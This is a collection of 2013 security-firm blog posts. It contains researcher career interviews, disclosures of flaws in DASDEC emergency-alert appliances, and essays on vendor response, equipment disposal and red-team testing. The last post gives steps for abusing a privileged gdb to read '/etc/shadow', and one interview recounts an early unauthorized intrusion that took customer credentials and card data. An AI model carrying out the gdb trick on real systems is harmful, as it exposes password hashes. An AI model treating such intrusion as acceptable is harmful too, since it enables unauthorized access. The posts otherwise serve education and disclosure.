INSIGHTS | October 22, 2013

NCSAM – Lucas Apa explains the effects of games cheating, 3D modeling, and psychedelic trance music on IT security

I got involved with computers in 1994 when I was six years old. I played games for some years without even thinking about working in the security field. My first contact with the security field was when I started to create “trainers” to cheat on games by manipulating their memory. This led me to find many tutorials related to assembly and cracking in 2001, when my security research began.

The thin line of legality at that time was blurred by actions not considered illegal. This allowed an explosion of hacking groups, material, and magazines. Many of the hacking techniques that still prevail today started in the early century. At that time I lacked good programming skills and an Internet connection in my homeland, Argentina. I got interested in packers and solved many crackmes because I wondered how commercial games built anti-cracking protections. At that time pirated games were heavily distributed in my country. Having some experience with debuggers allowed me to quickly learn the foundations of programming languages. Many years of self-education and a soon to finish computer engineering degree finally gave me sufficient insight to comprehend how modern software works.

When I was a teenager, I also had the opportunity to explore other areas related to computers, such as 3D modeling (animated short films) and producing psychedelic trance music. All these artistic and creative expressions help me appraise and seize an opportunity, especially when seeing how a new exploitation technique works or providing a new innovative solution or approach to a problem.

There was a moment that I realized the serious effort and true thirst I needed to achieve what could be impossible for other people. The security industry is highly competitive, and it sometimes requires extreme skills to provide a comprehensive response or a novel methodology for doing things. The battle between offensive and defensive security has always been entertaining, pushing the barrier of imagination and creativity every time. This awakens true passion in the people who like being part of this game. Every position is important, and the most interesting part is that both sides are convinced that their decisions are right and accurate.

I like to research everything that could be used to play a better offense in real-world scenarios. Learning about technologies and discovering how to break them is something I do for a living. Defensive security has become stronger in some areas and requires more sophisticated techniques to reliably and precisely defeat. Today, hacking skills in general are more difficult to master because of the vast amount of information that is available out there. Great research demands a conceptual vision and being reckless when facing past experiences that show that something is not achievable. My technical interests involve discovering vulnerabilities, writing exploits, and playing offensive in CTF’s; something close to being inside the quicksand but behind defensive lines. This is one of my favourite feelings, and why I choose to work on security everyday.

My first advice to someone who would like to become a pen tester or researcher is to always maintain patience, dedication, and effort. This is a very satisfying career, but requires a deep and constant learning phase. Having a degree in Computer Science/Engineering will help you get a general overview of how the technology world works, but much of the knowledge and abilities can only be learned and mastered with personal intensive training. Technology changes every year, and future systems could be much different than today’s. The key is to not focus too much on one thing without tasting other fields inside the security world. Fortunately, they can be combined since in this career all the subjects have the same goal. Learn to appreciate other investigative works, blog posts, and publications; every detail is sometimes a result of months or weeks worth of work. Information is relatively available to everyone, you just need to dive in and start your journey with the topics you like most.

INSIGHTS | October 21, 2013

NCSAM – Eireann Leverett on why magic is crucial

Late last week I had the pleasure of interviewing IOActive Labs CTO – Cesar Cerrudo on how he got into IT security. Today I am fortunate enough to have the pleasure of interviewing Eireann Leverett, a senior researcher for IOActive on this field and how magic played a part.

IOActive: How did you get into security?
 
Eireann: Actually, I was very slow to get security as an official title for a job, it was only really in the last few years. However, I always knew that’s how my mind was bent.
For example, everything I know about software security I learned from card tricks at 14. I know it seems ridiculous, but it’s true. Predicting session id’s from bad PRNGs is just like shuffle-tracking and card counting. Losing a card in the deck and finding it again is like controlling a pointer. If you understand the difference between a riffle shuffle and an overhand shuffle you understand list manipulation.
Privilege escalation is not unlike using peeks and forces in mentalism to corrupt assumptions about state. Cards led me to light maths and light crypto and zero-knowledge proofs.
From there I studied formally in Artificial Intelligence and Software Engineering in Edinburgh. The latter part took me into 5+ years Quality Assurance and Automated Testing, which I still believe is a very important place to breed security professionalism.
After that I did my Master’s at Cambridge and accepted a great offer from IOActive mixing research and penetration testing. Enough practicality so I’m not irrelevant to real world application, and enough theory & time to look out to the horizon.
IOActive: What do you find most exciting about security?
 
Eireann: The diversity of subjects. I will never know it all, and I love that it continually evolves. It is exciting to pit yourself against the designs of others, and work against malicious and deceptive people.
There are not many jobs in life where you get to pretend to be a bad guy. Deceptionists are not usually well regarded by society. However, in this industry having the mindset is very much rewarded.
There’s a quote from Houdini I once shared with our President and Founder, and we smile about it often. The quote is:
“Magic is the right way to do wrong.”
That’s what being an IOActive pirate is: the right way to do wrong. We make invisible badness visible, and explain it to those who need to understand business and process instead of worrying about the detail of the technology.
IOActive: What do you like to research, and why?
 
Eireann: Anything with a physical consequence. I don’t want to work in banking protecting other people’s money. My blood gets flowing when there are valves to open, current flowing, or bay doors to shut. In this sense, I’m kind of a redneck engineer.
There’s a more academic side to me as well though and my research passions. I like incident response and global co-operation. I took something Team Cymru & Dragon Research said to heart:
Security is more about protecting your neighbours.
If you don’t understand that your company can be compromised by the poor security of your support connections you’ve missed the point. That’s why we have dynamic information sharing and great projects like openIOC, BGPranking, honeynets, and organisations like FIRST. It doesn’t do you any good to secure only yourself. We must share to win, as a global society.
IOActive: What advice would you give to someone who would like to become a pentester/researcher?
 
Eireann: Curiosity and autodidacticism is the only way.
The root to hacking is understanding. To hack is to understand something better than it understands itself, and then nudge it to alter outputs. You won’t understand anything you listen to other people tell you about. So go do things, either on your own, or in formal education. Ultimately it doesn’t matter as long as you learn and understand, and can articulate what you learned to others.
INSIGHTS | October 18, 2013

NCSAM – an Interview with Cesar Cerrudo

Today we continue our support for National Cyber Security Awareness Month, by interviewing Cesar Cerrudo, Chief Technology Officer for IOActive Labs. Cesar provides us with some insight of how he got into IT security and why it’s important to be persistent!

IOActive: How did you get into security?
 
Cesar: I think my first hacks were when I was 10 years old or so. I modified BASIC code on CZ Spectrum games and also cheated games by loading different parts of the code from a cassette (yes not floppy disk at that time and loading games from a cassette took around 5-10mins and if something went wrong you have to try again, I don’t miss that at all ), but after that I was mostly away from computers until I was 19 years old and went to college.
I was always interested on learning to hack but didn’t have enough resources or access to a PC. So while I was at college I started to read books, articles, etc. – anything I could get my hands on. I used to play (and sometimes break) a friend’s PC (hi Flaco ) once in a while when I had the opportunity. I remember learning Assembly language just from reading books and looking at virus code printed in papers. Finding that virus code and learning from it was amazing (not having a PC wasn’t a problem; a PC is just a tool).
Later on, with some internet access (an hour or so a week), it became easier since lots of information became available and I got access to a PC; so I started to try the things I read about and started to build my own tools, etc.
When you’re learning and reading, one topic takes you to another topic and so on, but I focused on things that I was more familiar with – like web apps, database servers, Microsoft Windows, etc.
Luckily in Argentina it wasn’t illegal to hack at that time so I could try things in real life and production systems . A long time ago, I remember walking to the office of the CEO of my local ISP provider handing him hundred thousands of users, passwords and credit card information and telling him that their servers where hackable and that I hacked them. I know this sounds crazy but I was young and in the end they thank me, and I helped them identify and fix the vulnerabilities. I asked for a job but no luck, don’t know why .
I also did other crazy hacks when I was young but better to not talk about that , nothing criminal. I used to report the vulnerabilities but most admins didn’t like it. I recommend not engaging in anything illegal, as nowadays you can easily end up in jail if you try to hack a system. Today it is simpler to build a lab and play safely at home.
Luckily those crazy times ended and soon I started to find vulnerabilities in known and widely used software such as SQL Server, Oracle, Windows, etc., I was then also able to create some new attack and exploitation techniques, etc.
IOActive: What do you find most exciting about security?
 
Cesar: Learning new things, challenges, solving difficult problems, etc. You get to deeply study how some technologies work and can identify security problems on software/hardware massively used worldwide that sometimes have big impact on everyone’s lives since everything has become digital nowadays.
IOActive: What do you like to research, and why?
 
Cesar: This is related to previous answers, but I like challenges, learning and hacking stuff.
IOActive: What advice would you give to someone who would like to become a pentester/researcher?
 
Cesar: My advice would be if you are interested in or like hacking, nothing can stop you. Everything is out there to learn. You just need to try hard and put in a lot of effort without ever giving up. Nothing is impossible it’s just matter of effort and persistence.
INSIGHTS | October 17, 2013

Strike Two for the Emergency Alerting System and Vendor Openness

Back in July I posted a rant about my experiences reporting the DASDEC issues and the problems I had getting things fixed. Some months have passed and I thought it would be a good time to take a look at how the vulnerable systems have progressed since then.
Well, back then my biggest complaint was the lack of forthrightness in Monroe Electronics’ public reporting of the issues; they were treated as a marketing problem rather than a security one. The end result (at the time) was that there were more vulnerable systems available on the internet – not fewer – even though many of the deployed appliances had adopted the 2.0-2 patch.
What I didn’t know at the time was that the 2.0-2 patch wasn’t as effective as one would have hoped; in most cases bad and predictable credentials were left in place intentionally – as in I was informed that Monroe Electronics were “intentionally not removing the exposed key(s) out of concern for breaking things.”
In addition to not removing the exposed keys, it didn’t appear that anyone even tried to review or audit any other aspect of the DASDEC security before pushing the update out. If someone told you that you had a shared SSH key for root you might say… check the root password wasn’t the same for every box too right? Yeah… you’d think so wouldn’t you!
After discovering that most of the “patched” servers running 2.0-2 were still vulnerable to the exposed SSH key I decided to dig deeper in to the newly issued security patch and discovered another series of flaws which exposed more credentials (allowing unauthenticated alerts) along with a mixed bag of predictable and hardcoded keys and passwords. Oh, and that there are web accessible back-ups containing credentials.
Even new features introduced to the 2.0-2 version since I first looked at the technology appeared to contain a new batch of hardcoded (in their configuration) credentials.
Upon our last contact with CERT we were informed that ‘[t]hese findings are entering the realms of “not terribly serious” and “not something the vendor can practically do much about.”‘
Go team cyber-security!
So… on one hand we’ve had one zombie alert and a good hand-full of responsibly disclosed issues which began back in January 2013… on the other hand I’m not sure anything changed except for a few default passwords and some version numbers.
Let’s not forget that the EAS is a critical national infrastructure component designed to save lives in an emergency. Ten months on and the entire system appears more vulnerable than when we began pointing out the vulnerabilities.
INSIGHTS | October 16, 2013

A trip down cyber memory lane, or from C64 to #FF0000 teaming

So, it’s National Cyber Security Awareness Month, and here at IOActive we have been lining up some great content for you. Before we get to that, I was asked to put in a short post with some background on how I got to info sec, and what has been keeping me here for almost 20 years now.

Brace yourselves for a trip down memory lane then :-). For me getting into security didn’t start with a particular event or decision. I’ve always been intrigued by how things worked, and I used to take things apart, and sometimes also put them back together. Playing with Meccano, Lego, assorted electrical contraptions, radios, etc. Things got a bit more serious when I was about 6 or 7 when somehow I managed to convince my parents to get me one of those newfangled computers. It was a Commodore 64 (we were late adopters at the Amit residence), but the upside is I had a real floppy drive rather than a tape cassette 😉
That has been my introduction to programming (and hacking). After going through all the available literature I could get my hands on in Hebrew, I switched over to the English one (having to learn the language as I went along), and did a lot of basic programming (yes, BASIC programming). That’s also when I started to deal with basic software protection mechanisms.
Things got more real later on in my PC days, when I was getting back to programming after a long hiatus, and I managed to pick this small project called Linux and tried to get it working on my PC. Later I realized that familiarity with kernel module development and debugging was worth something in the real world in the form of security.
Ever since then, I find myself in a constant learning curve, always running into new technologies and new areas of interest that tangent information security. It’s what has been keeping my ADD satisfied, as I ventured into risk, international law, finances, economic research, psychology, hardware, physical security and other areas that I’m probably forgetting in the edits to this post (have I mentioned ADD?).
I find it hard to define “what I like to research” as my interest range keeps expanding and venturing into different areas. Once it was a deep dive into Voice over IP and how it can be abused to exfiltrate data, another time it was exploring the business side of cyber-crime and how things worked there from an “economy” perspective, other times it was purely defense based when I was trying to switch seats and was dealing with a large customer who needed to up their defenses properly. It even got weird at some point where I was dealing with the legal international implications of conflict in the 5th domain when working with NATO on some new advisories and guidance (law is FUN, and don’t let anyone tell you otherwise!).
I guess that for me it’s the mixture of technical and non-technical elements and how these apply in the real world… It kind of goes back to my alma-mater (The Interdisciplinary Center) where I had a chance to hone some of these research skills.
As for advice on to how to become a pentester / researcher / practitioner of information security? Well, that’s a tough one. I’d say that you would need to have the basics, which for me has always been an academic degree. Any kind of degree. I know that a lot of people feel they are not “learning” anything new in the university because they already mastered Ruby, Python, C++ or whatever. That’s not the point. For me the academia gave tools rather than actual material (yes, I also breezed through the programming portions of college). But that wouldn’t be enough. You’d need something more than just skills to stay in the industry. A keen eye for details, an inquisitive mind, at times I’d call it cunning, to explore things that are out of boundaries. And sometimes a bit of moxie (Chutzpa as it’s called in Hebrew) to try things that you aren’t completely allowed to. But safely of course 😉
Hope this makes sense, and maybe sheds some light on what got me here, and what keeps driving me ahead. Have a safe and enjoyable “Cyber” month! 🙂
INSIGHTS | September 10, 2013

Vulnerability bureaucracy: Unchanged after 12 years

One of my tasks at IOActive Labs is to deal with vulnerabilities; report them, try to get them fixed, publish advisories, etc. This isn’t new to me. I started to report vulnerabilities something like 12 years ago and over that time I have reported hundreds of vulnerabilities – many of them found by me and by other people too.

Since the early 2000’s I have encountered several problems when reporting vulnerabilities:
  • Vendor not responding
  • Vendor responding aggressively
  • Vendor responding but choosing not to fix the vulnerability
  • Vendor releasing flawed patches or didn’t patch some vulnerabilities at all
  • Vendor failing to meet deadlines agreed by themselves

It’s really sad to tell that, as of right now, 12 years later, I continue to see most (if not all) of the same problems. Not only that, but some organizations that are supposed to help and coordinate vulnerability reporting and disclosure (CERTs) are starting to fail, being non responsive and not contributing much to the effort.
This shouldn’t be a big problem if you are reporting low impact or unimportant vulnerabilities, but most of the time the team here at IOActive report critical vulnerabilities affecting systems ranging from critical infrastructure to the most popular commercial applications, OS’s, etc. used by millions of people around the world. There is a big responsibility upon us to work with the affected vendors to get the vulnerabilities fixed and thinking about how bad things could be if they are exploited.
It’s also surprising to sometimes see the tardy response from some teams that are supposed to act and respond fast such as Android security team given that Google has some strong vulnerability polices (12):
It would be nice if most vendors, CERTs, etc. are aware of the following:
  • Independent researchers and security consulting companies report vulnerabilities on a voluntary basis.
  • Independent researchers and security consulting companies have no obligation to report security vulnerabilities.
  • Independent researchers and security consulting companies often invest a lot of time, effort and resources finding vulnerabilities and trying to get them fixed.
  • Vendors and CERTs should be more appreciative of the people reporting vulnerabilities and, at the very least, be more responsive than they typically are today.
  • Vendors and CERTs should adhere and comply with their own defined deadlines.
I would like for vendors and CERTs to start improving a little and becoming more responsive; the attack surface grows everyday and vulnerabilities affect our lives more and more. The more we depend on technology the more the vulnerabilities will impact us.
There shouldn’t be vulnerability bureaucracy.
If there’s one thing that vendors and CERTs could do to improve the situation, that would be for them to step-up and be accountable for the vulnerability information entrusted to them.
I hope that in the following 12 years something will change for the better.
INSIGHTS | July 11, 2013

Why Vendor Openness Still Matters

When the zombies began rising from their graves in Montana it had already been over 30 days since IOActive had reported issues with Monroe Electronics DASDECS.
 
And while it turned out in the end that the actual attacks which caused the false EAS messages to be transmitted relied on the default password never having been changed, this would have been the ideal point to publicize that there was a known issue and that there was a firmware update available, or would soon be to address this and other problems… maybe a mitigation or two in the mean time right?

At a minimum it would have been an ideal time to provide the simple mitigation:
“rm ~/.ssh/authorized_keys”
 
Unfortunately this never happened, leading to a phenomena I like to call “admin droop”.  This is where an administrator, after discovering the details of a published vulnerability, determines that he’s not vulnerable because he doesn’t run the default configuration and everything is working and doesn’t bother to upgrade to the next version.
 
… it happens…
 
In the absence of reliable information other outlets such as the FCC provided pretty minimal advice about changing passwords and using firewalls; I simply commented to the media that this was “inadequate” advice.
 
Eventually, somewhere around April 24 Monroe, with the assistance of CERT begin contacting customers about a firmware fix, we provided a Shodan XML file with a few hundred vulnerable hosts to help track them down. Finally it looked like things were getting fixed but I was somewhat upset that I still had not seen official acknowledgement of the issue from Monroe but on June 13 Monroe finally published this https://ioactive.com/wp-content/uploads/2013/07/130604-Monroe-Security-PR.pdf 
security advisory where it stated “Removal of default SSH keys and a simplified user option to load new SSH keys”, ok its not much of an “announcement” but its something and  I know it says April 24, but both the filename and metadata (pdfinfo) point to cough later origins…
 
Inside the advisory is this wonderful sentence: 
“The company notes that most of its users already have obtained this update.”… That sound s like something worth testing!
 
Then it happened, before I could say “admin droop”… 
 
Found/Vulnerable hosts before we reported the issue:   222
Found hosts After the patch was released, as found by a survey on July  11:  412
 
Version numbers       
         Hosts Found
       Vulnerable (SSH Key)
1.8-5a
                1
                 Yes
1.8-6
                2
                 Yes
2.0-0
              110
                 Yes
2.0-0_a01
                1
                 Yes
2.0-1
               68           
                 Yes
2.0-2 (patched)
               50
                  No
unreachable                              180

While most users may have “obtained” the update, someone certainly didn’t bother applying it…
 
Yep… it’s worse now than it was before we reported the issue in January, and everyone thinks everything is just fine. While I’m sure this would still be a problem had a proper security notice been issued.
 
I can’t say it any better than these awesome folks over at Google http://googleonlinesecurity.blogspot.com/2013/05/disclosure-timeline-for-vulnerabilities.html : “Our standing recommendation is that companies should fix critical vulnerabilities within 60 days — or, if a fix is not possible, they should notify the public about the risk and offer workarounds.”

 

INSIGHTS | July 4, 2013

Why sanitize excessed equipment

My passion for cybersecurity centers on industrial controllers–PLCs, RTUs, and the other “field devices.” These devices are the interface between the integrator (e.g., HMI systems, historians, and databases) and the process (e.g., sensors and actuators). Researching this equipment can be costly because PLCs and RTUs cost thousands of dollars. Fortunately, I have an ally: surplus resellers that sell used equipment.

I have been buying used equipment for a few years now. Equipment often arrives to me literally ripped from a factory floor or even a substation. Each controller typically contains a wealth of information about its origin. I can often learn a lot about a company from a piece of used equipment. Even decades-old control equipment has a lot of memory and keeps a long record about the previous owner’s process. It is possible to learn the “secret recipe” with just a few hours of work at reverse engineering a controller to collect company names, control system network layout, and production history. Even engineers’ names and contact information is likely to be stored in a controller’s log file. For a bad guy, the data could be useful for all sorts of purposes: social engineering employees, insider trading of company stock, and possibly direct attacks to the corporate network.
I reach out to the origin of used equipment when I find these types of information. I help them wipe the equipment, and I point them to where the rest of the equipment is being sold in an attempt to recall it before the stored information ends up in the wrong hands. I am not the only one doing this kind of work. Recently, Billy Rios and Terry McCorkle revealed surplus equipment that they had purchased from a hospital. It had much of the same information about its origin.

These situations can be prevented by sanitizing the equipment before it’s released for disposal. Many equipment manufacturers should be able to provide instructions for this process. One option may be to send the controller back to the manufacturer to be sanitized and refurbished.
A way to provide another layer of protection against information disclosure is to have a robust and well-practiced Incident Response plan. Most places that I contact are great to work with and are receptive to the information.

Ignoring the issue, especially where a public utility is concerned, may be considered a violation. Set up an Incident Response program now and make sure that your process control engineers know to send equipment disposal issues through the IR group.

 

A great deal can be accomplished to keep a control system secure. With a little planning, proper equipment disposal is one of the cheapest things that can be done to keep proprietary process information safe.
INSIGHTS | June 14, 2013

Red Team Testing: Debunking Myths and Setting Expectations

The term “cyber” seems to be overused in every corner of the information security industry. Now there is a new buzz phrase in computer security, “red team engagements.” Supposedly (to get “cyber” on you), you can have a red team test, and it will help move your organization in the correct “cyber direction.”
But what is red team testing really? And what is it not? In this post I’ll try to make some sense of this potent term.
The red team concept has been around for ages. It started as a military term for a team dedicated to simulating all of an enemy’s activities, including everything from methodology to doctrine, strategy, techniques, equipment, and behaviors. The red team was tasked with mastering how the adversary thinks and operates, and then executing the enemy’s strategies and tactics in the field. This allows your own forces to experience what it would be like to combat this enemy in real life − without the risk of getting injured or killed.
Fast forward 10-12 years and red teams are being used in civilian industry as well as in the military. In private industry, red teams simulate adversaries (not necessarily foreign armies) that could impact the organization. The adversary could be criminals vying to get your money, competitors trying to get their hands on your latest designs, or random attackers who want to exploit, destroy, or simply harm your organization. Their motivations can range from social activism, political strategy, financial gain, and so on.

When IOActive is asked to conduct a red team test, our main goal is to accurately and realistically simulate these types of adversaries. So the first, and probably most important, element of a red team test is to define the threat model:

·      Who is your adversary?
·      What are their motivations?
·      Which adversaries are you most afraid of? (This is usually any party that wants to put you out of business.)
Defining the threat model is crucial to the success of a red team engagement, because it determines the value your organization will get from the project.
After we articulate the threat model, the fun part of the engagement begins.
Fun? Yes, because in the real world most tests, such as penetration tests do not really depict a persistent adversary. Instead, engagements such as pen tests simulates specific strategies that a persistent adversary will use as part of an overall attack.
The red team engagement, on the other hand, includes all possible elements that an adversary might use in such an attack (which is why it is often referred to as “no scope” or “full scope” testing).
In this context, everything including your employees, your infrastructure, the physical office locations, your supply chain − that’s every third party you use as part of your ongoing operations  − and more. When developing attack scenarios for red team engagements, every element has to fit in perfectly.

Think of it as an “Ocean’s Eleven” type of attack that can include:

·      Social engineering
·      Electronic and digital attacks
·      Bypassing physical controls
·      Equipment tampering
·      Getting into the supply chain to access your assets
·      And more

This is full scope testing. Unlike in other types of engagement, all or almost all assets are “in scope”.

Note: Red team engagements do commonly use “reverse scoping” techniques to identify assets that are critical to operations and the types of tampering, access, or removal that are off limits for these assets. These sensitive assets are still in scope. But reverse scoping defines and restricts actions that may substantially disrupt operations.)
So far this sounds like a fun game. But hold on, it isn’t just about the attack. What I like the most is seeing how an organization’s ongoing security operations handle red team attacks.
In a red team test, very few people in the organization know about the test, and even fewer actually know when the test will happen. This means that from an operational security view, all red team activities are treated as if they involve a real adversary.

We gain a lot of insights from the actions and reactions of the organization’s security team to a red team attack. These are the types of insights that matter the most to us:

  • Observing how your monitoring capabilities function during the intelligence gathering phase. The results can be eye opening and provide tremendous value when assessing your security posture.
  • Measuring how your first (and second) responders in information security, HR, and physical security work together. Teamwork and coordination among teams is crucial and the assessment allows you to build processes that actually work.
  • Understanding what happens when an attacker gains access to your assets and starts to exfiltrate information or actually steals equipment. The red team experience can do wonders for your disaster recovery processes.
These are some of the rewards and benefits of a red team test. As you can see, they go well above and beyond what you would get from other types of focused tests.
I hope this explanation eliminates some of the confusion about red team testing that I have seen lately in Internet discussions. I am not saying that there is no value in pen tests, social engineering engagements, physical assessments, or anti-phishing campaign. However, to see how all of these different types of security considerations work in the real world, they also need to be considered as part of a larger (and relevant) context so that you can see how well your organization is prepared for any type of attack.
Last but not least, if you’d like to get hands-on training in how red team engagements are conducted, considering attending our two-day Red Team Training (https://www.blackhat.com/us-13/training/red-team-training.html) at BlackHat 2013 in Las Vegas.
Chris Nickerson and I will cover everything discussed in this post, with particular focus on the elements that go beyond penetration testing. Our topics will include lock picking, social engineering, physical assessments, and, most importantly, how to combine all of these elements into a realistic and successful simulation of an adversary. We also plan to give each of our students a very interesting goodie bag.
Hint: You’ll have fun walking through airport security with that bag :-).
INSIGHTS | April 16, 2013

Can GDB’s List Source Code Be Used for Evil Purposes?

One day while debugging an ELF executable with the GNU Debugger (GDB), I asked myself, “How does GDB know which file to read when you use the list command?” (For the uninformed, the list command prints a specified number of lines from a source code file -— ten lines is the default.)
Source code filenames are contained in the metadata of an ELF executable (in the .debug_line section, to be exact). When you use the list command, GDB will open(), read(), and display the file contents if and only if GDB has the permissions needed to read the source file. 
The following is a simple trick where you can use GDB as a trampoline to read a file which originally you don’t have enough permission to read. This trick could also be helpful in a binary capture-the-flag (CTF) or reverse engineering challenge.
Here are the steps:
 

1. Compile ‘foo.c‘ with the GNU Compiler (GCC) using the -ggdb flag.

2. Open the resulting ELF executable with GDB and the list command to read its source code as shown in the following screen shot:

 

3. Make a copy of ‘foo.c’ and call it ‘_etc_shadow.c’, so that this name is hardcoded within the internal metadata structures of the compiled ELF executable as in the following screen shot.

 

4. Open the executable with your preferred hex editor (I used HT Editor because it supports the ELF file format) and replace ‘_etc_shadow.c’ with ‘/etc/shadow’ (don’t forget the NULL character at the end of the string) the first two times it appears.

 

5. Evidently, it won’t work unless you have sufficient user privileges, otherwise GDB won’t be able to read /etc/shadow.

 

6. If you trace the open() syscall calls executed by GBD:

 ($strace -e open gdb ./_etc_shadow) 
you can see that it returns -1 (EACCES) because of insufficient permissions.
 

7. Now imagine that for some reason GDB is a privileged command (the SUID (Set User ID) bit in the permissions is enabled). Opening our modified ELF file with GDB, it would be possible to read the contents of ‘/etc/shadow’ because the gdb command would be executed with root privileges.

 

8. Imagine another hypothetical scenario: a hardened development (or CTF) server that has been configured with granular privileges using a tool such as Sudo to allow certain commands to be executed. (To be honest I have never seen a scenario like this before, but it’s an example worth considering to illustrate how this attack might evolve).

 

9. You cannot display the contents of‘/etc/shadow’ by using the cat command because /bin/cat is an unauthorized command in our configuration. However, the gdb command has been authorized and therefore has the rights needed to display the source file (/etc/shadow):

 

Voilà! 
 

Taking advantage of this GDB feature and mixing it with other techniques could make a more sophisticated attack possible. Use your imagination.
 

Do you have other ideas how this could be used as an attack vector, either by itself or if combined with other techniques? Let me know.